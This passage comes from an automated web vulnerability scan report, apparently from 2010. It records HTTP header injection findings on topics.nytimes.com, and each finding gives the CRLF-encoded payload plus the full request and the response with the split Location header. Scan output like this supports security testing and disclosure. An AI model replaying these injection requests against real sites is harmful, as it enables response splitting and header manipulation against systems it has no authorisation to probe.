GET /top/news/2bbb8%0d%0aba85651de7d/companies/facebook_inc/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/2bbb8 ba85651de7d/companies/facebook_inc/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.32. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/business/companies/facebook_inc/
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload b9baf%0d%0aa1360d28e2e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/news/business/b9baf%0d%0aa1360d28e2e/facebook_inc/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/business/b9baf a1360d28e2e/facebook_inc/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.33. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/business/companies/facebook_inc/
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload c984f%0d%0a8bf08eaef82 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/news/business/companies/c984f%0d%0a8bf08eaef82/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/business/companies/c984f 8bf08eaef82/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.34. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/international/countriesandterritories/afghanistan/
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 452b3%0d%0a45e72dace08 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/452b3%0d%0a45e72dace08/international/countriesandterritories/afghanistan/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:01 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/452b3 45e72dace08/international/countriesandterritories/afghanistan/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.35. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/international/countriesandterritories/afghanistan/
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 702ff%0d%0af1bdf025466 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/news/702ff%0d%0af1bdf025466/countriesandterritories/afghanistan/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/702ff f1bdf025466/countriesandterritories/afghanistan/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.36. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/international/countriesandterritories/afghanistan/
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload dd652%0d%0aabf2c5794ae was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/news/international/dd652%0d%0aabf2c5794ae/afghanistan/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/international/dd652 abf2c5794ae/afghanistan/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.37. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/international/countriesandterritories/afghanistan/
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload 27e5f%0d%0a005360684f4 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/news/international/countriesandterritories/27e5f%0d%0a005360684f4/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:03 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/international/countriesandterritories/27e5f 005360684f4/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.38. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/international/countriesandterritories/haiti/
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload ac067%0d%0a8fd1d3084c5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/ac067%0d%0a8fd1d3084c5/international/countriesandterritories/haiti/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:56:27 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/ac067 8fd1d3084c5/international/countriesandterritories/haiti/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.39. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/international/countriesandterritories/haiti/
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload b1249%0d%0aa65178becf8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/news/b1249%0d%0aa65178becf8/countriesandterritories/haiti/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:56:27 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/b1249 a65178becf8/countriesandterritories/haiti/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.40. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/international/countriesandterritories/haiti/
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 32910%0d%0a75a8d968bdf was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/news/international/32910%0d%0a75a8d968bdf/haiti/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:56:28 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/international/32910 75a8d968bdf/haiti/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.41. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/international/countriesandterritories/haiti/
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload 4754f%0d%0a05a44130f21 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/news/international/countriesandterritories/4754f%0d%0a05a44130f21/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:56:29 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/international/countriesandterritories/4754f 05a44130f21/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.42. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/science/topics/globalwarming/
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload b9b2a%0d%0a6be4bca8bd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/b9b2a%0d%0a6be4bca8bd/science/topics/globalwarming/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:52 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/b9b2a
6be4bca8bd/science/topics/globalwarming/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.43. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/science/topics/globalwarming/
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload e5cd4%0d%0adb7fbdd22fb was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/news/e5cd4%0d%0adb7fbdd22fb/topics/globalwarming/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:52 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/e5cd4
db7fbdd22fb/topics/globalwarming/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.44. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/science/topics/globalwarming/
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 93137%0d%0a300951b64e8 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/news/science/93137%0d%0a300951b64e8/globalwarming/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:53 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/science/93137
300951b64e8/globalwarming/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.45. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/science/topics/globalwarming/
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload ffc0c%0d%0a5ed16640b46 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/news/science/topics/ffc0c%0d%0a5ed16640b46/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:53 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/science/topics/ffc0c
5ed16640b46/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.46. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/opinion/editorialsandoped/editorials/
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 9c216%0d%0aceb0867e582 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/9c216%0d%0aceb0867e582/editorialsandoped/editorials/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:39 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/9c216
ceb0867e582/editorialsandoped/editorials/index.html
Connection: close

